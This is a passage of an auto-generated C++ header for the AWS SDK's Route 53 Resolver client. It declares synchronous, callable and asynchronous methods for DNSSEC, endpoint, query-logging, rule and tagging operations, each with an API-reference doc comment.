triggers associated callback when operation has finished. */ virtual void GetResolverQueryLogConfigAssociationAsync(const Model::GetResolverQueryLogConfigAssociationRequest& request, const GetResolverQueryLogConfigAssociationResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context = nullptr) const; /** * <p>Gets information about a query logging policy. A query logging policy * specifies the Resolver query logging operations and resources that you want to * allow another AWS account to be able to use.</p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/GetResolverQueryLogConfigPolicy">AWS * API Reference</a></p> */ virtual Model::GetResolverQueryLogConfigPolicyOutcome GetResolverQueryLogConfigPolicy(const Model::GetResolverQueryLogConfigPolicyRequest& request) const; /** * <p>Gets information about a query logging policy. A query logging policy * specifies the Resolver query logging operations and resources that you want to * allow another AWS account to be able to use.</p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/GetResolverQueryLogConfigPolicy">AWS * API Reference</a></p> * * returns a future to the operation so that it can be executed in parallel to other requests. */ virtual Model::GetResolverQueryLogConfigPolicyOutcomeCallable GetResolverQueryLogConfigPolicyCallable(const Model::GetResolverQueryLogConfigPolicyRequest& request) const; /** * <p>Gets information about a query logging policy. A query logging policy * specifies the Resolver query logging operations and resources that you want to * allow another AWS account to be able to use.</p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/GetResolverQueryLogConfigPolicy">AWS * API Reference</a></p> * * Queues the request into a thread executor and triggers associated callback when operation has finished. */ virtual void GetResolverQueryLogConfigPolicyAsync(const Model::GetResolverQueryLogConfigPolicyRequest& request, const GetResolverQueryLogConfigPolicyResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context = nullptr) const; /** * <p>Gets information about a specified Resolver rule, such as the domain name * that the rule forwards DNS queries for and the ID of the outbound Resolver * endpoint that the rule is associated with.</p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/GetResolverRule">AWS * API Reference</a></p> */ virtual Model::GetResolverRuleOutcome GetResolverRule(const Model::GetResolverRuleRequest& request) const; /** * <p>Gets information about a specified Resolver rule, such as the domain name * that the rule forwards DNS queries for and the ID of the outbound Resolver * endpoint that the rule is associated with.</p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/GetResolverRule">AWS * API Reference</a></p> * * returns a future to the operation so that it can be executed in parallel to other requests. */ virtual Model::GetResolverRuleOutcomeCallable GetResolverRuleCallable(const Model::GetResolverRuleRequest& request) const; /** * <p>Gets information about a specified Resolver rule, such as the domain name * that the rule forwards DNS queries for and the ID of the outbound Resolver * endpoint that the rule is associated with.</p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/GetResolverRule">AWS * API Reference</a></p> * * Queues the request into a thread executor and triggers associated callback when operation has finished. */ virtual void GetResolverRuleAsync(const Model::GetResolverRuleRequest& request, const GetResolverRuleResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context = nullptr) const; /** * <p>Gets information about an association between a specified Resolver rule and a * VPC. You associate a Resolver rule and a VPC using <a * href="https://docs.aws.amazon.com/Route53/latest/APIReference/API_route53resolver_AssociateResolverRule.html">AssociateResolverRule</a>. * </p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/GetResolverRuleAssociation">AWS * API Reference</a></p> */ virtual Model::GetResolverRuleAssociationOutcome GetResolverRuleAssociation(const Model::GetResolverRuleAssociationRequest& request) const; /** * <p>Gets information about an association between a specified Resolver rule and a * VPC. You associate a Resolver rule and a VPC using <a * href="https://docs.aws.amazon.com/Route53/latest/APIReference/API_route53resolver_AssociateResolverRule.html">AssociateResolverRule</a>. * </p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/GetResolverRuleAssociation">AWS * API Reference</a></p> * * returns a future to the operation so that it can be executed in parallel to other requests. */ virtual Model::GetResolverRuleAssociationOutcomeCallable GetResolverRuleAssociationCallable(const Model::GetResolverRuleAssociationRequest& request) const; /** * <p>Gets information about an association between a specified Resolver rule and a * VPC. You associate a Resolver rule and a VPC using <a * href="https://docs.aws.amazon.com/Route53/latest/APIReference/API_route53resolver_AssociateResolverRule.html">AssociateResolverRule</a>. * </p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/GetResolverRuleAssociation">AWS * API Reference</a></p> * * Queues the request into a thread executor and triggers associated callback when operation has finished. */ virtual void GetResolverRuleAssociationAsync(const Model::GetResolverRuleAssociationRequest& request, const GetResolverRuleAssociationResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context = nullptr) const; /** * <p>Gets information about the Resolver rule policy for a specified rule. A * Resolver rule policy includes the rule that you want to share with another * account, the account that you want to share the rule with, and the Resolver * operations that you want to allow the account to use. </p><p><h3>See Also:</h3> * <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/GetResolverRulePolicy">AWS * API Reference</a></p> */ virtual Model::GetResolverRulePolicyOutcome GetResolverRulePolicy(const Model::GetResolverRulePolicyRequest& request) const; /** * <p>Gets information about the Resolver rule policy for a specified rule. A * Resolver rule policy includes the rule that you want to share with another * account, the account that you want to share the rule with, and the Resolver * operations that you want to allow the account to use. </p><p><h3>See Also:</h3> * <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/GetResolverRulePolicy">AWS * API Reference</a></p> * * returns a future to the operation so that it can be executed in parallel to other requests. */ virtual Model::GetResolverRulePolicyOutcomeCallable GetResolverRulePolicyCallable(const Model::GetResolverRulePolicyRequest& request) const; /** * <p>Gets information about the Resolver rule policy for a specified rule. A * Resolver rule policy includes the rule that you want to share with another * account, the account that you want to share the rule with, and the Resolver * operations that you want to allow the account to use. </p><p><h3>See Also:</h3> * <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/GetResolverRulePolicy">AWS * API Reference</a></p> * * Queues the request into a thread executor and triggers associated callback when operation has finished. */ virtual void GetResolverRulePolicyAsync(const Model::GetResolverRulePolicyRequest& request, const GetResolverRulePolicyResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context = nullptr) const; /** * <p>Lists the configurations for DNSSEC validation that are associated with the * current AWS account.</p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/ListResolverDnssecConfigs">AWS * API Reference</a></p> */ virtual Model::ListResolverDnssecConfigsOutcome ListResolverDnssecConfigs(const Model::ListResolverDnssecConfigsRequest& request) const; /** * <p>Lists the configurations for DNSSEC validation that are associated with the * current AWS account.</p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/ListResolverDnssecConfigs">AWS * API Reference</a></p> * * returns a future to the operation so that it can be executed in parallel to other requests. */ virtual Model::ListResolverDnssecConfigsOutcomeCallable ListResolverDnssecConfigsCallable(const Model::ListResolverDnssecConfigsRequest& request) const; /** * <p>Lists the configurations for DNSSEC validation that are associated with the * current AWS account.</p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/ListResolverDnssecConfigs">AWS * API Reference</a></p> * * Queues the request into a thread executor and triggers associated callback when operation has finished. */ virtual void ListResolverDnssecConfigsAsync(const Model::ListResolverDnssecConfigsRequest& request, const ListResolverDnssecConfigsResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context = nullptr) const; /** * <p>Gets the IP addresses for a specified Resolver endpoint.</p><p><h3>See * Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/ListResolverEndpointIpAddresses">AWS * API Reference</a></p> */ virtual Model::ListResolverEndpointIpAddressesOutcome ListResolverEndpointIpAddresses(const Model::ListResolverEndpointIpAddressesRequest& request) const; /** * <p>Gets the IP addresses for a specified Resolver endpoint.</p><p><h3>See * Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/ListResolverEndpointIpAddresses">AWS * API Reference</a></p> * * returns a future to the operation so that it can be executed in parallel to other requests. */ virtual Model::ListResolverEndpointIpAddressesOutcomeCallable ListResolverEndpointIpAddressesCallable(const Model::ListResolverEndpointIpAddressesRequest& request) const; /** * <p>Gets the IP addresses for a specified Resolver endpoint.</p><p><h3>See * Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/ListResolverEndpointIpAddresses">AWS * API Reference</a></p> * * Queues the request into a thread executor and triggers associated callback when operation has finished. */ virtual void ListResolverEndpointIpAddressesAsync(const Model::ListResolverEndpointIpAddressesRequest& request, const ListResolverEndpointIpAddressesResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context = nullptr) const; /** * <p>Lists all the Resolver endpoints that were created using the current AWS * account.</p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/ListResolverEndpoints">AWS * API Reference</a></p> */ virtual Model::ListResolverEndpointsOutcome ListResolverEndpoints(const Model::ListResolverEndpointsRequest& request) const; /** * <p>Lists all the Resolver endpoints that were created using the current AWS * account.</p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/ListResolverEndpoints">AWS * API Reference</a></p> * * returns a future to the operation so that it can be executed in parallel to other requests. */ virtual Model::ListResolverEndpointsOutcomeCallable ListResolverEndpointsCallable(const Model::ListResolverEndpointsRequest& request) const; /** * <p>Lists all the Resolver endpoints that were created using the current AWS * account.</p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/ListResolverEndpoints">AWS * API Reference</a></p> * * Queues the request into a thread executor and triggers associated callback when operation has finished. */ virtual void ListResolverEndpointsAsync(const Model::ListResolverEndpointsRequest& request, const ListResolverEndpointsResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context = nullptr) const; /** * <p>Lists information about associations between Amazon VPCs and query logging * configurations.</p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/ListResolverQueryLogConfigAssociations">AWS * API Reference</a></p> */ virtual Model::ListResolverQueryLogConfigAssociationsOutcome ListResolverQueryLogConfigAssociations(const Model::ListResolverQueryLogConfigAssociationsRequest& request) const; /** * <p>Lists information about associations between Amazon VPCs and query logging * configurations.</p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/ListResolverQueryLogConfigAssociations">AWS * API Reference</a></p> * * returns a future to the operation so that it can be executed in parallel to other requests. */ virtual Model::ListResolverQueryLogConfigAssociationsOutcomeCallable ListResolverQueryLogConfigAssociationsCallable(const Model::ListResolverQueryLogConfigAssociationsRequest& request) const; /** * <p>Lists information about associations between Amazon VPCs and query logging * configurations.</p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/ListResolverQueryLogConfigAssociations">AWS * API Reference</a></p> * * Queues the request into a thread executor and triggers associated callback when operation has finished. */ virtual void ListResolverQueryLogConfigAssociationsAsync(const Model::ListResolverQueryLogConfigAssociationsRequest& request, const ListResolverQueryLogConfigAssociationsResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context = nullptr) const; /** * <p>Lists information about the specified query logging configurations. Each * configuration defines where you want Resolver to save DNS query logs and * specifies the VPCs that you want to log queries for.</p><p><h3>See Also:</h3> * <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/ListResolverQueryLogConfigs">AWS * API Reference</a></p> */ virtual Model::ListResolverQueryLogConfigsOutcome ListResolverQueryLogConfigs(const Model::ListResolverQueryLogConfigsRequest& request) const; /** * <p>Lists information about the specified query logging configurations. Each * configuration defines where you want Resolver to save DNS query logs and * specifies the VPCs that you want to log queries for.</p><p><h3>See Also:</h3> * <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/ListResolverQueryLogConfigs">AWS * API Reference</a></p> * * returns a future to the operation so that it can be executed in parallel to other requests. */ virtual Model::ListResolverQueryLogConfigsOutcomeCallable ListResolverQueryLogConfigsCallable(const Model::ListResolverQueryLogConfigsRequest& request) const; /** * <p>Lists information about the specified query logging configurations. Each * configuration defines where you want Resolver to save DNS query logs and * specifies the VPCs that you want to log queries for.</p><p><h3>See Also:</h3> * <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/ListResolverQueryLogConfigs">AWS * API Reference</a></p> * * Queues the request into a thread executor and triggers associated callback when operation has finished. */ virtual void ListResolverQueryLogConfigsAsync(const Model::ListResolverQueryLogConfigsRequest& request, const ListResolverQueryLogConfigsResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context = nullptr) const; /** * <p>Lists the associations that were created between Resolver rules and VPCs * using the current AWS account.</p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/ListResolverRuleAssociations">AWS * API Reference</a></p> */ virtual Model::ListResolverRuleAssociationsOutcome ListResolverRuleAssociations(const Model::ListResolverRuleAssociationsRequest& request) const; /** * <p>Lists the associations that were created between Resolver rules and VPCs * using the current AWS account.</p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/ListResolverRuleAssociations">AWS * API Reference</a></p> * * returns a future to the operation so that it can be executed in parallel to other requests. */ virtual Model::ListResolverRuleAssociationsOutcomeCallable ListResolverRuleAssociationsCallable(const Model::ListResolverRuleAssociationsRequest& request) const; /** * <p>Lists the associations that were created between Resolver rules and VPCs * using the current AWS account.</p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/ListResolverRuleAssociations">AWS * API Reference</a></p> * * Queues the request into a thread executor and triggers associated callback when operation has finished. */ virtual void ListResolverRuleAssociationsAsync(const Model::ListResolverRuleAssociationsRequest& request, const ListResolverRuleAssociationsResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context = nullptr) const; /** * <p>Lists the Resolver rules that were created using the current AWS * account.</p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/ListResolverRules">AWS * API Reference</a></p> */ virtual Model::ListResolverRulesOutcome ListResolverRules(const Model::ListResolverRulesRequest& request) const; /** * <p>Lists the Resolver rules that were created using the current AWS * account.</p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/ListResolverRules">AWS * API Reference</a></p> * * returns a future to the operation so that it can be executed in parallel to other requests. */ virtual Model::ListResolverRulesOutcomeCallable ListResolverRulesCallable(const Model::ListResolverRulesRequest& request) const; /** * <p>Lists the Resolver rules that were created using the current AWS * account.</p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/ListResolverRules">AWS * API Reference</a></p> * * Queues the request into a thread executor and triggers associated callback when operation has finished. */ virtual void ListResolverRulesAsync(const Model::ListResolverRulesRequest& request, const ListResolverRulesResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context = nullptr) const; /** * <p>Lists the tags that you associated with the specified resource.</p><p><h3>See * Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/ListTagsForResource">AWS * API Reference</a></p> */ virtual Model::ListTagsForResourceOutcome ListTagsForResource(const Model::ListTagsForResourceRequest& request) const; /** * <p>Lists the tags that you associated with the specified resource.</p><p><h3>See * Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/ListTagsForResource">AWS * API Reference</a></p> * * returns a future to the operation so that it can be executed in parallel to other requests. */ virtual Model::ListTagsForResourceOutcomeCallable ListTagsForResourceCallable(const Model::ListTagsForResourceRequest& request) const; /** * <p>Lists the tags that you associated with the specified resource.</p><p><h3>See * Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/ListTagsForResource">AWS * API Reference</a></p> * * Queues the request into a thread executor and triggers associated callback when operation has finished. */ virtual void ListTagsForResourceAsync(const Model::ListTagsForResourceRequest& request, const ListTagsForResourceResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context = nullptr) const; /** * <p>Specifies an AWS account that you want to share a query logging configuration * with, the query logging configuration that you want to share, and the operations * that you want the account to be able to perform on the * configuration.</p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/PutResolverQueryLogConfigPolicy">AWS * API Reference</a></p> */ virtual Model::PutResolverQueryLogConfigPolicyOutcome PutResolverQueryLogConfigPolicy(const Model::PutResolverQueryLogConfigPolicyRequest& request) const; /** * <p>Specifies an AWS account that you want to share a query logging configuration * with, the query logging configuration that you want to share, and the operations * that you want the account to be able to perform on the * configuration.</p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/PutResolverQueryLogConfigPolicy">AWS * API Reference</a></p> * * returns a future to the operation so that it can be executed in parallel to other requests. */ virtual Model::PutResolverQueryLogConfigPolicyOutcomeCallable PutResolverQueryLogConfigPolicyCallable(const Model::PutResolverQueryLogConfigPolicyRequest& request) const; /** * <p>Specifies an AWS account that you want to share a query logging configuration * with, the query logging configuration that you want to share, and the operations * that you want the account to be able to perform on the * configuration.</p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/PutResolverQueryLogConfigPolicy">AWS * API Reference</a></p> * * Queues the request into a thread executor and triggers associated callback when operation has finished. */ virtual void PutResolverQueryLogConfigPolicyAsync(const Model::PutResolverQueryLogConfigPolicyRequest& request, const PutResolverQueryLogConfigPolicyResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context = nullptr) const; /** * <p>Specifies an AWS rule that you want to share with another account, the * account that you want to share the rule with, and the operations that you want * the account to be able to perform on the rule.</p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/PutResolverRulePolicy">AWS * API Reference</a></p> */ virtual Model::PutResolverRulePolicyOutcome PutResolverRulePolicy(const Model::PutResolverRulePolicyRequest& request) const; /** * <p>Specifies an AWS rule that you want to share with another account, the * account that you want to share the rule with, and the operations that you want * the account to be able to perform on the rule.</p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/PutResolverRulePolicy">AWS * API Reference</a></p> * * returns a future to the operation so that it can be executed in parallel to other requests. */ virtual Model::PutResolverRulePolicyOutcomeCallable PutResolverRulePolicyCallable(const Model::PutResolverRulePolicyRequest& request) const; /** * <p>Specifies an AWS rule that you want to share with another account, the * account that you want to share the rule with, and the operations that you want * the account to be able to perform on the rule.</p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/PutResolverRulePolicy">AWS * API Reference</a></p> * * Queues the request into a thread executor and triggers associated callback when operation has finished. */ virtual void PutResolverRulePolicyAsync(const Model::PutResolverRulePolicyRequest& request, const PutResolverRulePolicyResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context = nullptr) const; /** * <p>Adds one or more tags to a specified resource.</p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/TagResource">AWS * API Reference</a></p> */ virtual Model::TagResourceOutcome TagResource(const Model::TagResourceRequest& request) const; /** * <p>Adds one or more tags to a specified resource.</p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/TagResource">AWS * API Reference</a></p> * * returns a future to the operation so that it can be executed in parallel to other requests. */ virtual Model::TagResourceOutcomeCallable TagResourceCallable(const Model::TagResourceRequest& request) const; /** * <p>Adds one or more tags to a specified resource.</p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/TagResource">AWS * API Reference</a></p> * * Queues the request into a thread executor and triggers associated callback when operation has finished. */ virtual void TagResourceAsync(const Model::TagResourceRequest& request, const TagResourceResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context = nullptr) const; /** * <p>Removes one or more tags from a specified resource.</p><p><h3>See Also:</h3> * <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/UntagResource">AWS * API Reference</a></p> */ virtual Model::UntagResourceOutcome UntagResource(const Model::UntagResourceRequest& request) const; /** * <p>Removes one or more tags from a specified resource.</p><p><h3>See Also:</h3> * <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/UntagResource">AWS * API Reference</a></p> * * returns a future to the operation so that it can be executed in parallel to other requests. */ virtual Model::UntagResourceOutcomeCallable UntagResourceCallable(const Model::UntagResourceRequest& request) const; /** * <p>Removes one or more tags from a specified resource.</p><p><h3>See Also:</h3> * <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/UntagResource">AWS * API Reference</a></p> * * Queues the request into a thread executor and triggers associated callback when operation has finished. */ virtual void UntagResourceAsync(const Model::UntagResourceRequest& request, const UntagResourceResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context = nullptr) const; /** * <p>Updates an existing DNSSEC validation configuration. If there is no existing * DNSSEC validation configuration, one is created.</p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/UpdateResolverDnssecConfig">AWS * API Reference</a></p> */ virtual Model::UpdateResolverDnssecConfigOutcome UpdateResolverDnssecConfig(const Model::UpdateResolverDnssecConfigRequest& request) const; /** * <p>Updates an existing DNSSEC validation configuration. If there is no existing * DNSSEC validation configuration, one is created.</p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/UpdateResolverDnssecConfig">AWS * API Reference</a></p> * * returns a future to the operation so that it can be executed in parallel to other requests. */ virtual Model::UpdateResolverDnssecConfigOutcomeCallable UpdateResolverDnssecConfigCallable(const Model::UpdateResolverDnssecConfigRequest& request) const; /** * <p>Updates an existing DNSSEC validation configuration. If there is no existing * DNSSEC validation configuration, one is created.</p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/UpdateResolverDnssecConfig">AWS * API Reference</a></p> * * Queues the request into a thread executor and triggers associated callback when operation has finished. */ virtual void UpdateResolverDnssecConfigAsync(const Model::UpdateResolverDnssecConfigRequest& request, const UpdateResolverDnssecConfigResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context = nullptr) const; /** * <p>Updates the name of an inbound or an outbound Resolver endpoint. * </p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/UpdateResolverEndpoint">AWS * API Reference</a></p> */ virtual Model::UpdateResolverEndpointOutcome UpdateResolverEndpoint(const Model::UpdateResolverEndpointRequest& request) const; /** * <p>Updates the name of an inbound or an outbound Resolver endpoint. * </p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/UpdateResolverEndpoint">AWS * API Reference</a></p> * * returns a future to the operation so that it can be executed in parallel to other requests. */ virtual Model::UpdateResolverEndpointOutcomeCallable UpdateResolverEndpointCallable(const Model::UpdateResolverEndpointRequest& request) const; /** * <p>Updates the name of an inbound or an outbound Resolver endpoint. * </p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/UpdateResolverEndpoint">AWS * API Reference</a></p> * * Queues the request into a thread executor and triggers associated callback when operation has finished. */ virtual void UpdateResolverEndpointAsync(const Model::UpdateResolverEndpointRequest& request, const UpdateResolverEndpointResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context = nullptr) const; /** * <p>Updates settings for a specified Resolver rule. <code>ResolverRuleId</code> * is required, and all other parameters are optional. If you don't specify a * parameter, it retains its current value.</p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/UpdateResolverRule">AWS * API Reference</a></p> */ virtual Model::UpdateResolverRuleOutcome UpdateResolverRule(const Model::UpdateResolverRuleRequest& request) const; /** * <p>Updates settings for a specified Resolver rule. <code>ResolverRuleId</code> * is required, and all other parameters are optional. If you don't specify a * parameter, it retains its current value.</p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/UpdateResolverRule">AWS * API Reference</a></p> * * returns a future to the operation so that it can be executed in parallel to other requests. */ virtual Model::UpdateResolverRuleOutcomeCallable UpdateResolverRuleCallable(const Model::UpdateResolverRuleRequest& request) const; /** * <p>Updates settings for a specified Resolver rule. <code>ResolverRuleId</code> * is required, and all other parameters are optional. If you don't specify a * parameter, it retains its current value.</p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/UpdateResolverRule">AWS * API Reference</a></p> * * Queues the request into a thread executor and triggers associated callback when operation has finished. */ virtual void UpdateResolverRuleAsync(const Model::UpdateResolverRuleRequest& request, const UpdateResolverRuleResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context = nullptr) const; void OverrideEndpoint(const Aws::String& endpoint); private: void init(const Aws::Client::ClientConfiguration& clientConfiguration); void AssociateResolverEndpointIpAddressAsyncHelper(const Model::AssociateResolverEndpointIpAddressRequest& request, const AssociateResolverEndpointIpAddressResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const; void AssociateResolverQueryLogConfigAsyncHelper(const Model::AssociateResolverQueryLogConfigRequest& request, const AssociateResolverQueryLogConfigResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const; void AssociateResolverRuleAsyncHelper(const Model::AssociateResolverRuleRequest& request, const AssociateResolverRuleResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const; void CreateResolverEndpointAsyncHelper(const Model::CreateResolverEndpointRequest& request, const CreateResolverEndpointResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const; void CreateResolverQueryLogConfigAsyncHelper(const Model::CreateResolverQueryLogConfigRequest& request, const CreateResolverQueryLogConfigResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const; void CreateResolverRuleAsyncHelper(const Model::CreateResolverRuleRequest& request, const CreateResolverRuleResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const; void DeleteResolverEndpointAsyncHelper(const Model::DeleteResolverEndpointRequest& request, const DeleteResolverEndpointResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const; void DeleteResolverQueryLogConfigAsyncHelper(const Model::DeleteResolverQueryLogConfigRequest& request, const DeleteResolverQueryLogConfigResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const; void DeleteResolverRuleAsyncHelper(const Model::DeleteResolverRuleRequest& request, const DeleteResolverRuleResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const; void DisassociateResolverEndpointIpAddressAsyncHelper(const Model::DisassociateResolverEndpointIpAddressRequest& request, const DisassociateResolverEndpointIpAddressResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const; void DisassociateResolverQueryLogConfigAsyncHelper(const Model::DisassociateResolverQueryLogConfigRequest& request, const DisassociateResolverQueryLogConfigResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const; void DisassociateResolverRuleAsyncHelper(const Model::DisassociateResolverRuleRequest& request, const DisassociateResolverRuleResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const; void GetResolverDnssecConfigAsyncHelper(const Model::GetResolverDnssecConfigRequest& request, const GetResolverDnssecConfigResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const; void GetResolverEndpointAsyncHelper(const Model::GetResolverEndpointRequest& request, const GetResolverEndpointResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const; void GetResolverQueryLogConfigAsyncHelper(const Model::GetResolverQueryLogConfigRequest& request, const GetResolverQueryLogConfigResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const; void GetResolverQueryLogConfigAssociationAsyncHelper(const Model::GetResolverQueryLogConfigAssociationRequest& request, const GetResolverQueryLogConfigAssociationResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const; void GetResolverQueryLogConfigPolicyAsyncHelper(const Model::GetResolverQueryLogConfigPolicyRequest& request, const GetResolverQueryLogConfigPolicyResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const; void GetResolverRuleAsyncHelper(const Model::GetResolverRuleRequest& request, const GetResolverRuleResponseReceivedHandler& handler, const std::shared_ptr<const 